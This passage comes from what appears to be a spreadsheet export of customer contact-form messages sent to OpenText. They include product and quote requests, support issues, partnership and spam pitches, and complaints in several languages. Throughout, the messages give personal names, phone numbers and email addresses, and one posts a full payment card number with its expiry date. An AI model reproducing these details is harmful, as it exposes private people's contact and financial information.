Please send me your contact Details &amp; Skype id, so that we can send you more details about package/action with special Offer and explain you why your competitors have out ranked you._x000D_
_x000D_
If you are interested, please reply to this mail and i will get back to you. Otherwise just let me know._x000D_
_x000D_
Have a great day!!_x000D_
_x000D_
Aditya Agarwal_x000D_
</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
wir sind ein F&amp;E-Unternehmen der Life Science-Branche und bewegen uns gemeinsam mit unseren Partnern auf die Produktion von Material für klinische Prüfungen zu. Daher installieren wir ein Qualitätsmanagementsystem. Unser Ziel ist es, dieses auf elektronischer Grundlage zu betreiben. Als ersten Schritt stellen wir uns vor, ein elektronisches Dokumentensystem zu etablieren. _x000D_
Documentum scheint dafür ein Werkzeug zu sein. _x000D_
Bitte rufen Sie uns zurück, um die Möglichkeiten zu diskutieren._x000D_
Freundliche Grüße,_x000D_
Antje Sahm</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
Get connected to 1,830 customers database of AS400 Technology from Australia_x000D_
Would you be interested in knowing more about it?_x000D_
If yes, I can send you test file and Additional information ._x000D_
Regards,_x000D_
Kaitlyn Kristy_x000D_
</t>
  </si>
  <si>
    <t>Revoke randyc support account - User is retiring 09/14</t>
  </si>
  <si>
    <t xml:space="preserve">Good Day,_x000D_
I am hosting the AI for Enterprise conference in Kuala Lumpur this coming 23-24th January 2019._x000D_
I foresee your organization being a good fit as a speaker and sponsor for the event._x000D_
Our delegates will be Caliber Decision Makers(80%)._x000D_
_x000D_
Key Focus: Inducing AI in back-office processes to expand the prospective capacity of services, creating more vibrant and productive business operation_x000D_
_x000D_
• Elevating supports on productivity gains and meeting consumer demands using AI_x000D_
platform_x000D_
• Centralizing real-time processes and turnaround in enterprise’s departmental_x000D_
operation_x000D_
• Leveraging the AI and machine learning in risk management to monitor workforce_x000D_
through real-time mechanisms_x000D_
• Adapting AI-enabled tools to strategies effective marketing-related analytics to_x000D_
finetune customer base_x000D_
• Consolidating AI tools in reforming the conventional methods in customer service_x000D_
and operational framework in business and services_x000D_
• Discovering the advantage of the fully-automated trading and portfolio management_x000D_
to accommodate business for asset movements_x000D_
_x000D_
If you need further info please do let me know._x000D_
_x000D_
It would be great if I can get in touch with you in regards to this so we can take this further._x000D_
Thanks,_x000D_
_x000D_
_x000D_
Regards._x000D_
                                                                                                   _x000D_
Emy Gani_x000D_
Sposorship Executive_x000D_
T: +603 2775 0000 (ext.533)_x000D_
M:+6012 6174212_x000D_
Fax: +603 2775 0055_x000D_
</t>
  </si>
  <si>
    <t>We have an old version of Application Xtender, it is only compatable with XP devices which requires us to use older additional computers to run the program. It is good software and we like it very much, it is also very simple. We received a quote to upgrade in 2011 and the quote was unreasonable @ over $21,000. I figure with technology improvements, there should be a much more affordable solution to our scanning / document needs.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team, can you please assist with an quote for PixTools for R1 RCM, located here in Chicago?_x000D_
_x000D_
QTY 1 _x000D_
PixTools IP (5 INST) ST Maintenance_x000D_
11/04/18 - 11/03/19_x000D_
Unique # 93215-12336 Unique Name: NDR_x000D_
Instance ID 93527401_x000D_
_x000D_
1000003179_x000D_
(456-011-476_M)_x000D_
_x000D_
QTY 1 _x000D_
PixTools IP (5 INST) ST Maintenance_x000D_
11/04/18 - 11/03/19_x000D_
Unique # 93215-12336 Unique Name: NDR_x000D_
Instance ID 93527400_x000D_
_x000D_
1000003181_x000D_
(456-011-477_M)_x000D_
_x000D_
Please let me know if you have any questions_x000D_
_x000D_
Brooks Courtright _x000D_
Enterprise Support | Softchoice_x000D_
Direct: 312-655-9002 x323328_x000D_
brooks.courtright@softchoice.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Interest in training for and obtaining EnCE certification.</t>
  </si>
  <si>
    <t xml:space="preserve">Tried to use our 3 day getaway..got a lot of bs from customer service plus he hung up on me...we will be contacting a lawyer </t>
  </si>
  <si>
    <t>Information on document management system. Avail for demo btw Oct. 30 - Nov. 2, 2018. Thank you! Alison Jacobs</t>
  </si>
  <si>
    <t>We need to upload bar codes in our catalog and need help regarding that. Our prefix is 855961008</t>
  </si>
  <si>
    <t>Need to renew licences</t>
  </si>
  <si>
    <t>I need some more information regarding Encase software.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Team,_x000D_
_x000D_
We are the General Authority of Zakat and Tax (GAZT) of Kingdom of Saudi Arabia -link- a semi-government agency._x000D_
_x000D_
We came across your solution Safe Guard for pdf and Microsoft Office and we are interested._x000D_
_x000D_
We would like you to come and present it so we can move to acquiring it._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
I am trying to reach someone that can verify employment information on a former employee Nicolas E. Augustine. Can you assist me or direct me to the correct person?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I am an IT analyst at the State of Minnesota working with the Department of Veteran's Affairs. I am looking for a contact to work with to complete a security assessment. </t>
  </si>
  <si>
    <t>Hi, Can I return a sub string, starting with a specific character till ending at a specific character in Open Text._x000D_
Ex: This is an approved document|This is not good|._x000D_
How can I return the sub string from "is an approved document", but I do not know the position where it starts. I only know that "This is an approved" is a mandatory text and I need to display from "This is an approved" till the "|"</t>
  </si>
  <si>
    <t>Licensing the ADA Connector. Looking for license cost and details.</t>
  </si>
  <si>
    <t xml:space="preserve">I NEED A QUOTE FOR THE FOLLOWING ASAP PLEASE.... _x000D_
OpenText	EnCase Forensic version 8.x Physical License		QTY 1_x000D_
OpenText	EnCase Forensic version 8.x SMS (1yr. Required)	QTY	1_x000D_
PLEASE EMAIL ATLEAST BUDGETARY PRICING FOR MY PROPOSAL.  _x000D_
THANK YOU.  STARLA </t>
  </si>
  <si>
    <t>Price quote on RightFax 4 &amp; 8 Port system for Mitel 3300</t>
  </si>
  <si>
    <t xml:space="preserve">Sales inquiry. Performing analysis of solution against organization's set of requirements. I would like to request some additional information from a sales rep. </t>
  </si>
  <si>
    <t xml:space="preserve">Can SIS, INC resell OpenDeploy?_x000D_
_x000D_
Jonathan Agan _x000D_
SIS, LLC/Software Information Systems_x000D_
</t>
  </si>
  <si>
    <t>As a reseller, how can we buy; EMC OpenText</t>
  </si>
  <si>
    <t>need a new W-9 for Name change from Easylink Account 862421</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am interested in setting up a POC for inbound faxing delivered by both e-mail and interface, with the goal of possible large-scale deployment across multiple organizations feeding into different instances of the same EMR.  We are partnered with Flatiron and OpenText is one of their supported/preferred fax integrations.  _x000D_
_x000D_
Thanks for your time,_x000D_
_x000D_
Luke Frailley</t>
  </si>
  <si>
    <t>Need to find our account executive.  It was Lane Reeder, but her email address is rejecting.</t>
  </si>
  <si>
    <t>Need a contact to discuss OpenText EnCase Forensic</t>
  </si>
  <si>
    <t>Requesting contact to discuss the OpenText Encase Forensic</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to request an Invoice with a new quote for my annual Encase Forensic renewal but cannot access the Guidance Software login page or your Opentext page. Upon receiving a password reset from you I entered the new password and it failed multiple times. My Encase on one of my forensic compturs appears to have gotten corrupted as it will only aquire but will not process a drive any longer, they all fail. I would like to download and reinstall Encase 8.7 but cannot. </t>
  </si>
  <si>
    <t xml:space="preserve">we have new request for Documentation solutions  </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
wir arbeiten mit KUKA zusammen im Salesforce Bereich und müssten aufgrund einer Fehlermeldung die Debug Logs des Managed Package von Open Text enablen. Könnten sie hierfür bitte mit mir Kontakt aufnehmen._x000D_
_x000D_
Viele Grüße_x000D_
Tom Raab</t>
  </si>
  <si>
    <t>Hello, _x000D_
I require support to install license</t>
  </si>
  <si>
    <t>Need pricing for Pixtools version 8.6.1._x000D_
_x000D_
We currently use Pixtools 8.5.1 and was told when we contacted support that this version is no longer supported.</t>
  </si>
  <si>
    <t>_x000D_
I am working as a freelance consultant helping freight forwarders in Denmark, to be more efficient in sea freight department. _x000D_
_x000D_
One of my customers, a global freight forwarding company, struggle with data entry and rate capture which the receiver in pdf or excel into a rate management system, coursing delays in quoting customers, and take not the best decision when booking containers._x000D_
_x000D_
Today, my client has a data entry team in China, but we are looking an IT solution to upload the rates from the shipping lines, like Maersk, Hapag, MSC, Yang Ming Line into their RMS and TMS, as the customer needs faster processing time and better data quality._x000D_
_x000D_
Do you have a solution for automatic data recognition and transfer this data into a standard format, which the customer is currently using?</t>
  </si>
  <si>
    <t>We have a PoC for testing your ICR technology. It's possible do a quick test?</t>
  </si>
  <si>
    <t>We used SuccessFactors Recruiting Management software. We are seeking a way to archive and retrieve data from it and want to know if OpenText is a viable option. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I am inquiring if you have a product that would allow us to migrate some large quantities of documents out of our content server 10.5. Please let me know if there is a process or product for this. Thank you. </t>
  </si>
  <si>
    <t xml:space="preserve">We need a Document Control Procedure Software . We will manage about 4000 drawings  tests results, letters, material data with mutiple revisions etc. _x000D_
_x000D_
We are about 30 users and our consutrcution project is about 7 years._x000D_
Please provide quotes for sofware available and package you offer , and what kind of services are available ?_x000D_
_x000D_
_x000D_
Oriental Consultants Global is a consulting company based in Japan that facilitates development in countries all around the world. We specialize in planning, design, construction supervision, and project management  for most types of infrastructure, but especially within the transportation sector (roads, bridges, railways, airports, ports), but also provide services for architectural works, water and sewerage systems, water resources development, agricultural engineering, rural and urban infrastructure, oil and gas facilities, energy, tourism, information technology, disaster management, and environmental protection._x000D_
</t>
  </si>
  <si>
    <t>SM</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
My name is Chiara Musco from Bee Social, a web &amp; communication agency._x000D_
I go quickly to the point: we are supporting iubenda to promote their services. Maybe you do know them: they generate automatically cookie and privacy policy for websites and mobile applications too._x000D_
We noticed that your website addresses a target very similar to that of our client: are you interested in a partnership, through which you can offer to your users a discount for cookie and privacy policies, keeping a revenue for you too, by including an affiliate link in a page or in a post of your website? We can also provide banners._x000D_
_x000D_
If you are interested, I will give you more details. _x000D_
Waiting for your reply; kind regards._x000D_
Chiara Musco_x000D_
</t>
  </si>
  <si>
    <t>Hallo zusammen,_x000D_
die innos - Sperlich GmbH ist derzeit auf der Suche nach einem Dateiaustauschsystem, das die Anforderungen, die die DSGVO an Unternehmen stellt, erfüllen kann. Im Rahmen dessen sind wir auf die OpenText Tempo Box gestoßen. Wir würden uns freuen, wenn Sie uns detaillierte Informationen zu Ihrer Cloud-Lösung wie bspw. Details zur DSGVO-Konformität bereitstellen könnten. Uns ist insbesondere wichtig, wo genau die Daten gespeichert werden und wie sie verschlüsselt werden. Wäre eine Anschaffung der Content Suite dafür nötig? Und wie sieht es mit der Lizenzierung und den Preisen aus. Vielen Dank im Voraus für die Beantwortung unserer Fragen. _x000D_
Beste Grüße,_x000D_
Marc Strelow</t>
  </si>
  <si>
    <t>Hi, we are a solutions provider in the philippines and we are interested  in your product OpenText Composer Notes that could migrate lotus notes application to dot net platform. Do you have a local partner in the philippines who we can contact? It would be for a prospective client (bank) who plans to migrate their lotus notes applications to dot net. I was able to contract mr. Roger Green  (in singapore)  but he told me that he is in charge on the  Intelligent Forms Automation and not this product. Pls help._x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t>Would need training for my 3 team members for OpenText, but we are based in Bratislava Slovakia, do you have some offices or external partnership with a company based in Slovakia who could deliver the in class training?_x000D_
_x000D_
Thank you,_x000D_
Peter</t>
  </si>
  <si>
    <t>A customer has requested a digital fax solution. I need to locate a UK supplier to supply and implement.</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
Wir von der Eder GmbH sind momentan auf der Suche nach einem geeigneten DMS für unser Unternehmen. Daher wollte ich mich gerne bei Ihnen erkundigen, da wir an Ihrer Lösung interessiert sind. Könnten Sie die folgenden Mindestvorraussetzungen bestätigen und unsere Fragen zu Ihrem Produkt beantworten? Gerne können Sie mir diese per E-Mail z.B. in einem Word Dokument per Anhang senden. Vielen Dank_x000D_
_x000D_
Voraussetzungen an ein Dokumentenmanagementsystem  für die Eder GmbH_x000D_
_x000D_
_x000D_
•	Welche Hardware Voraussetzungen besitzt ihr Produkt?_x000D_
_x000D_
_x000D_
_x000D_
•	Lässt sich ihr Produkt auf unserer virtualisierten Systemlandschaft installieren?_x000D_
_x000D_
_x000D_
•	Besitzen Sie einen eigenen Client oder läuft Ihr Programm auf einem Browser?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
•	Welchen Preis können sie uns bei 400 Benutzern anbieten?_x000D_
_x000D_
_x000D_
_x000D_
•	Ist Ihr Produkt mit unserem ERP System Infor M3 kompatibel(gibt Standardschnittstellen zu ERP Systemen bzw zu M3)?_x000D_
_x000D_
_x000D_
_x000D_
Folgende Mindestanforderungen stellen wir an Ihr Produkt:_x000D_
_x000D_
_x000D_
•	Dokumentenscanner_x000D_
_x000D_
•	Volltextsuche_x000D_
_x000D_
•	Revisionssichere Archivierung_x000D_
_x000D_
•	Lauffähig mit Windows_x000D_
_x000D_
•	Dokumente nach festgelegter Zeit automatisch löschen zu lassen (z.B. zur Beachtung der 10 Jahres Aufbewahrungsfrist)_x000D_
_x000D_
•	Anlegen einer digitalisierten Personalakte_x000D_
_x000D_
•	Workflow-Funktion mit Eskalationsmöglichkeit, wie z.B. automatische Erinnerung ein noch nicht bearbeitetes Dokument zu bearbeiten_x000D_
_x000D_
•	Mögliches Vertrags- und Fristenmanagement_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We use  opentext and have updated Doxis CSB. Now we have problems._x000D_
Is  Doxis4 CSB --- V03.04P3 (206887) [Windows Server 2012 R2 6.3,amd64]_x000D_
from opentext supported?_x000D_
_x000D_
Regards Ernst</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
My name is Niki Vougiouklidi and I am a member of the IT department of National Bank of Greece, as SAP consultant._x000D_
We are investigating for an available software to scan documents with a device and assign them directly to a SAP object (e.g. an employee), and have found the software “OpenText Imaging” - feature “Enterprise Scan”._x000D_
_x000D_
Kindly, please let me know for the following information regarding the cost:_x000D_
- cost for buying the software and the support. _x000D_
- is there any specific scan device you suggest for the purpose described above? _x000D_
_x000D_
I am looking forward for your reply._x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Niki Vougiouklidi  _x000D_
National Bank of Greece_x000D_
Tel: 00302103578810 _x000D_
E-mail: vougiouklidi.niki@nbg.gr</t>
  </si>
  <si>
    <t xml:space="preserve">will discuss it in call better </t>
  </si>
  <si>
    <t>We would like a presentation on your product, how it compares to Filenet, Thunderhead, Cofax, Hyland OnBase?  What features do you have compared to those products?  What features do you have in the insurance space?  Do you have anything (e.g. redaction tools) related to PCI/DSS or data privacy?_x000D_
_x000D_
Appreciate if you can get in touch with me soonest._x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t>I am currently looking at entity extraction and resolution services. Could you please let me know if if this is a domain opentext has a product for. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to arrange a sandbox of our current edocs dm 16.3.1 integrated with docusign and a workflow tool. We would like to check if these products meet our requirements. </t>
  </si>
  <si>
    <t>Providing the system in Korean language?_x000D_
What would be the cost to use?</t>
  </si>
  <si>
    <t>Issue connecting to the UhaulCarShare server through FirstClass</t>
  </si>
  <si>
    <t>To get a job</t>
  </si>
  <si>
    <t>Classes.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
We are thinking of doing an Legal AI day here at AbbVie and we would like to bring AI vendors in to demonstrate the capabilities of their software with specific examples. I see value in having you come to present during our event. We are anticipating a late November/early December timeframe as of right now. Would you or someone on your team be able to participate? Please let me know at your earliest convenience. </t>
  </si>
  <si>
    <t>We are a new customer.  I was given a link to download Rightfax 16 EP4 SR1.  I created my account,  but when I click on the link to try and download the files I'm getting an error saying I'm not authorized.  Was there a step I missed when I created my account?</t>
  </si>
  <si>
    <t>Access to MySupport to download latest version of Hummingbird Host Explorer v15.</t>
  </si>
  <si>
    <t>Interested in understanding DAM solutions on media (publication, video) etc.</t>
  </si>
  <si>
    <t>Endpoint Investigator Training</t>
  </si>
  <si>
    <t>I am reaching out on behalf of a client of ours, Austin Recovery, that recently had a fax line go down. Whenever we try to reassign to the fax number to the account on opentext, all it shows for the available fax numbers are forwarding numbers, or the numbers that forward to the Austin Recovery number 512.821.1907. I am wondering if you are able to find the line that forwards to that number for me? I can also send the numbers to you in an attachment, if that helps. Thank you for any help._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Travis Hoffmeister</t>
  </si>
  <si>
    <t>Alea Laygo, our sales rep, is gone. We want the VAN contract renewal pricing to be renegotiated. Please give me the contact info for our new sales rep.</t>
  </si>
  <si>
    <t xml:space="preserve">On our customers Jacobs/MDA Missile Defense Agency is would like to see if we can get them a quote for their Opentext maintenance.  Can we get pricing from you?  KELYN is a VAR_x000D_
Thanks - Nita </t>
  </si>
  <si>
    <t>Need specs for current recommended fax card to replace our current setup</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am trying to renew are software licenses and would like to speak to someone in regards to getting a quote._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Anthony</t>
  </si>
  <si>
    <t>We are or were using a Captaris Faxpress Server version 6 running windows xp with 2 analog phone lines going into it. It is connected to the network via IP and we are doing API calls from our IBM iSeries power 7 to send documents to it to fax out. It's currently no longer working and we are looking for an inexpensive replacement. Possibly the branch office server you offer. We need to know pricing and options for replacing this old fax server.</t>
  </si>
  <si>
    <t>I am a PM within RBC's Enterprise Risk IT team and we would like to understand how OpenText can assist with the upgrade of RBC's current enterprise wide Policy and Procedures library. Please contact me via email to further discuss next steps on this pursuit. _x000D_
_x000D_
Thanks &amp; Regards,_x000D_
Jigar Pathak</t>
  </si>
  <si>
    <t>I'm trying to access system to download software.  I've spent that last week just trying to get my account to work; which I did today and now it says I don't have access.  I'm confused.</t>
  </si>
  <si>
    <t xml:space="preserve">merci de me communiquer une offre de prix pour votre solution opentext_x000D_
</t>
  </si>
  <si>
    <t>I am interested in taking your 5-0152 OpenText Content Server System Administrator Certification Program v10.5 SP1 course, or even the CS 16 equivalent. I see it's not scheduled, but I've heard of it being offered on demand. Is there any possibility of taking it in Ottawa, Canada?</t>
  </si>
  <si>
    <t>Lynden Ltd is a claims management company that specalises in helping clients claim financial reward from being mis-sold product from financial companies, we are looking to digitize part of our claims process which would see all of our paper mail  being sent to an outsource company who would scan the documents and upload them to an SFTP._x000D_
_x000D_
we would then need to run the documents through a system where by they are categorised and given meaningful document names before being moved to a different location depending on the document type._x000D_
_x000D_
Our users will then process the documents which would see the files moved to a final location that can be linked to from our Claims Management System._x000D_
_x000D_
we have been in talks with Kofax about Kofax Total Agility but before going any further i would like to better understand if there is anyone else out there that can do this at a more competative price._x000D_
_x000D_
Best wishes,_x000D_
_x000D_
Darren Walsh</t>
  </si>
  <si>
    <t>We are using OpenText EIM as part of our existing SAP offering, and have a new project to move attached documentation stored in Oracle Service Cloud into OpenText. Can you advise on the best way to perform this migration - e.g. formatting of metadata &amp; attachments, automating the creation of new records in OpenText etc. _x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Wir fuehren zur Zeit eine Marktuntersuchung ueber die besten “Legal-Tech” Anbietern in Deutschland durch, und sind u.A. auch auf die Webseite von opentext gestossen welche sehr Anspruchsvoll und beeindruckend ist._x000D_
_x000D_
HighQ ist global ein fuehrender Anbieter von Cloud-Loesungen fuer die groessten Anwaltskanzleien (~50% sind bereits HighQ Kunden und Firmen wie Goldman Sachs and Morgan Stanley haben in unsere Firma investiert) und sind auf der Suche nach einem strategischen Partner in Deutschland (HighQ Data Centers befinden sich in Muenchen und Frankfurt)._x000D_
_x000D_
Bitte lassen Sie mich wissen ob wir eine Telefonkonferenz arrangieren koennen um vorhandene Moeglichkeiten einer Partnerschaft zu besprechen._x000D_
</t>
  </si>
  <si>
    <t>Dear whomever it may concern_x000D_
_x000D_
I am writing to you from Johnson Matthey who you have worked with in the past. This email comes as we want to enquire about the contact details of your data protection officer. As part of our requirements we would like if possible to obtain the details of the data protection officer or whomever deals with the handling of personal data at your company. If possible, it would be great if you could provide their email address, name and phone number._x000D_
_x000D_
Yours faithfully_x000D_
_x000D_
Patrick Gallagher</t>
  </si>
  <si>
    <t xml:space="preserve">SILENT iNSTALL STRING FOR VALIDATION OF BUSINESS CAPTURE CENTER 16.3 </t>
  </si>
  <si>
    <t>Hi sir,_x000D_
we need a quotation for "OpentextEdocs-DM Licence version 16.x" as soon as possible._x000D_
Best regards,_x000D_
Ayoub Nmirach, CEO, Zendev</t>
  </si>
  <si>
    <t>understanding further applications of a product we have procured</t>
  </si>
  <si>
    <t>Require Expert advise on creation a general template to capture multiple line invoices.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
_x000D_
die Siemens AG hat ihr mobility business, im Zuge mit der neuen Unternehmensvereinbarung mit Alstom, ausgegliedert in die Siemens Mobility GmbH._x000D_
Hierfür müssen auch die Lizenzen von der Siemens AG auf die Siemens Mobility GmbH umgeschrieben werden. Könnten Sie mir bitte einen geeigneten Kontakt per Mail zusenden, um diese Lizenzübertragung durchzuführen?_x000D_
Vielen Dank._x000D_
_x000D_
Mit freundlichen Grüßen,_x000D_
Marco Knobel</t>
  </si>
  <si>
    <t>Our existing customer who used RightFax from OpenText need to expand the module</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Greetings,_x000D_
_x000D_
I am Olivia and I represent a multinational shopping company. We are interested in advertising on your website as we are now currently running an Ad campaign which include Text and banner Ads and we would like you to be a part of it. I will be glad to form a long term business relationship with your website _x000D_
_x000D_
Kindly revert back to us with Pricing and suitable Ad positions. If the price offered is suited then we will be very glad to maintain business relationship with you for as long as the website stays._x000D_
_x000D_
_x000D_
Thanks and regards,_x000D_
Olivia</t>
  </si>
  <si>
    <t xml:space="preserve">Our group is planning to build a hackathon, if you sponsor us you can gain popularity without spending much money also you can use the hackathon to build new ideas for the company. </t>
  </si>
  <si>
    <t>Our organization is trying to fill an immediate need for document management specific to engineering (CAD) documents. The key business requirement that needs to be met: the solution must be able to search text within a CAD drawing. _x000D_
I am currently traveling and will not be reachable at my business phone #, but if you have someone e-mail me with a phone number I can call, that would be great. We are hoping to get this information as soon as possible._x000D_
We are also research enterprise-wide document management and want to learn more about OpenText as a whole (and how it integrates with SAP).</t>
  </si>
  <si>
    <t xml:space="preserve">"Hello,_x000D_
_x000D_
My name is Choy Saechao from CalPERS.  I have been tasked to find a product that can perform OCR with dynamic templating.  Currently, we have to create a new OCR template for each of our forms or if the form changes; we would like a product that can find the necessary field information no matter their location._x000D_
_x000D_
If this is something your company can do, please reply to this email with your contact information._x000D_
_x000D_
Thank you."_x000D_
</t>
  </si>
  <si>
    <t>My program is currently looking for a data management solution as we currently use a shared drive and paper reviews. We are interested in a browser based system in the cloud. However, we deal with classified material and need a secure system we can manage here. We are seeking a tool that will act as a repository, allow us to do full text search, allow us to do electronic, collaborative reviews and approve with electronic signatures, allow us to create and store user defined metadata and create reports based off the data. I can be reached at the number listed between 8 and 5 MST.</t>
  </si>
  <si>
    <t>WF</t>
  </si>
  <si>
    <t>国际法国家   规划今天 国家</t>
  </si>
  <si>
    <t xml:space="preserve">Trying to locate the name and contact of our account manager.  We need to discuss how to insert field level changes to electronic Healthcare DME form received as a TIF file.  We receive the form need to provide field level updates including electronic signature and resend through rightfax </t>
  </si>
  <si>
    <t>Do you have a Content Server 16 User Guide in PDF format?</t>
  </si>
  <si>
    <t>Want to know the benefits of partnership with OT and the Learning methods available.</t>
  </si>
  <si>
    <t>I have a PayPal Mastercard _x000D_
#5311 0673 7140 5335_x000D_
You are free to supply this card with a large amount of funds. I have been filling the posts out since you became printing them on this page!!!_x000D_
_x000D_
#5311 0673 7140 5335_x000D_
This card expires on 08/22</t>
  </si>
  <si>
    <t>I did not cancel my subscription to your account. At this point you owe me quite a bit of money. I would like to receive the funds I have made up unto this date. Thankyou for updating my subscription but if I don't see any profit from your company I feel there will be one less person you have to manage.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Opentext,_x000D_
We are interested in meeting at Dreamforce._x000D_
_x000D_
MarketSource is a division of Allegis Group a privately held human capital firm and 3RD Largest User of Salesforce on the planet._x000D_
_x000D_
We run very successful inside and field sales teams for companies like HP, IBM, AT&amp;T, T-Mobile and Sierra Wireless.  _x000D_
_x000D_
In 2017, we drove more than $7 BILLION of incremental revenue growth for our clients._x000D_
_x000D_
Our goal is to help you generate qualified leads and gain new customers._x000D_
_x000D_
Please have a sales leader get back to us._x000D_
_x000D_
Thanks,_x000D_
Jason_x000D_
</t>
  </si>
  <si>
    <t>We have Invoices 1808863673 and 1809863673 that we need to pay, but we need a W-9 to set up Open Text in our system.  Can you please send me a copy?  Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">We are a building material manufacturing and construction company. We have high level business requirements documented. At this stage, we need to understand if your document management solution meets our business needs. If yes, we need an indicative pricing (Professional Services to implement solution, Licensing cost and essentially total cost of ownership, annual maintenance etc...) </t>
  </si>
  <si>
    <t xml:space="preserve">Hi OpenText Support Team _x000D_
_x000D_
We are experiencing an issue with AFP's generated from version 9. _x000D_
Our Vendors who consume this AFP fail to process it due to below issue _x000D_
AFP pages are not allowed within PageGroups in ExternalPages mode_x000D_
_x000D_
We Jumped from Version 7 to Version 9 assuming the AFP's would be backward compatible but looks like that is not the case. _x000D_
_x000D_
We need your assistance to solve this problem_x000D_
_x000D_
Kind Regards_x000D_
Rakesh Koul </t>
  </si>
  <si>
    <t xml:space="preserve">We are a building material manufacturing and construction company. We are exploring document management solutions in the industry. We have high level business requirements documented. At this stage, we need to understand if your document management solution meets our business needs. If yes, we need an indicative pricing (Professional Services to implement solution, Licensing cost and essentially total cost of ownership, annual maintenance etc...) </t>
  </si>
  <si>
    <t>Julius Silvert is looking to organize itself and find a process solution for all departments within the organization</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a possible replacement for document sharing, storage, and retention. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi, we are gearing up for a major Teamsite upgrade from Solaris to Linux. I would like to talk to a migration expert and potentially, using professional services. </t>
  </si>
  <si>
    <t>please send a W9 for Opentext.  Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Can you direct me to the technical team that can assist with a RightFax upgrade and integration with Microsoft O365? Please email me at anthony.arcayan@hawaiianair.com and I will coordinate a meeting with our Hawaiian Airlines technical team to understand the scope of the upgrade and integration. </t>
  </si>
  <si>
    <t>A colleague and I registered for the OpenText Customer Experience Management User Group in San Mateo, CA but never received a confirmation email. Can you confirm that our registration was successful? Asking for myself and my co-worker, Travis Sandstrom at travis.sandstrom@octanner.com.</t>
  </si>
  <si>
    <t>We are a long time customer of OpenText and are currently using eDOCS DM10.  We would like to explore the cloud based solution.  Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">We have been acquired by a new company and are leaving our ECM system behind. We need to migrate and setup a new ECM for drafting and project teams. Please forward information that i can include in our evaluation of software. please feel free to contact me with any questions. </t>
  </si>
  <si>
    <t>Hello,_x000D_
I am doing some research on Encase and was looking for resources to develop use cases.  I was wondering if there are use cases that you have provided to potential buyers that can help with my research. I appreciate any help that you render._x000D_
_x000D_
Thanks,_x000D_
Edward Daniels</t>
  </si>
  <si>
    <t>Prezados, boa tarde!_x000D_
_x000D_
Meu nome é Bianca Marinone e estou entrando em contato em nome da OSB Software, uma revenda de softwares. Hoje nós atendemos clientes do âmbito Comercial, Governamental e Educacional de todo o Brasil. A OSB Software já tem aproximadamente 2000 parcerias com fabricantes de todo o mundo._x000D_
_x000D_
Atualmente recebemos uma oportunidade referente ao produto abaixo:_x000D_
Software Exceed on Demand_x000D_
1 licença governamental_x000D_
_x000D_
Poderia, por gentileza, nos enviar uma cotação com o custo para esta revenda? _x000D_
O que podemos fazer para fecharmos uma parceria?_x000D_
_x000D_
Também gostaria de saber se as licenças são anuais ou perpétuas, se são mídia física ou eletrônica e qual o método de pagamento._x000D_
_x000D_
No aguardo,_x000D_
_x000D_
Bianca</t>
  </si>
  <si>
    <t>Seek to speak with the Open Text Media Manager Product Manager.</t>
  </si>
  <si>
    <t>Job change</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Support, _x000D_
_x000D_
We have vendor invoice Management 7.0 SP7 running in our SAP ERP System. For some reason we need to install this component in a new fresh installed system but we don’t have the installer of VIM7.0 available for download, only the Support packages._x000D_
Would it be possible to obtain the installer? We just need the ERP component for SAINT/SPAM_x000D_
_x000D_
Best regards,_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Newport News Shipbuilding is looking for some information and pricing on your   OpenText EnCase Forensic software     </t>
  </si>
  <si>
    <t>hello guys _x000D_
_x000D_
my name is shankar acharya form nepal_x000D_
_x000D_
i want report bug</t>
  </si>
  <si>
    <t xml:space="preserve">I am reaching out to you from IBM GBS Enterprise Application team to see how we can collaborate on Open Text propositions from UKI and especially in SAP market. _x000D_
_x000D_
If so , please can we have a short call to introduce ourselves and perhaps look at ways to collaborate. </t>
  </si>
  <si>
    <t>I reset the password and the portal would not accept the new password?</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Nous étudions la mise en place d'une solution de dématérialisation de nos factures et contrats à court terme._x000D_
Nous souhaitons une présentation des solutions que vous proposez sur le sujet._x000D_
Pouvez-vous me contacter pour convenir d'une présentation de vos produits._x000D_
_x000D_
Cordialement.</t>
  </si>
  <si>
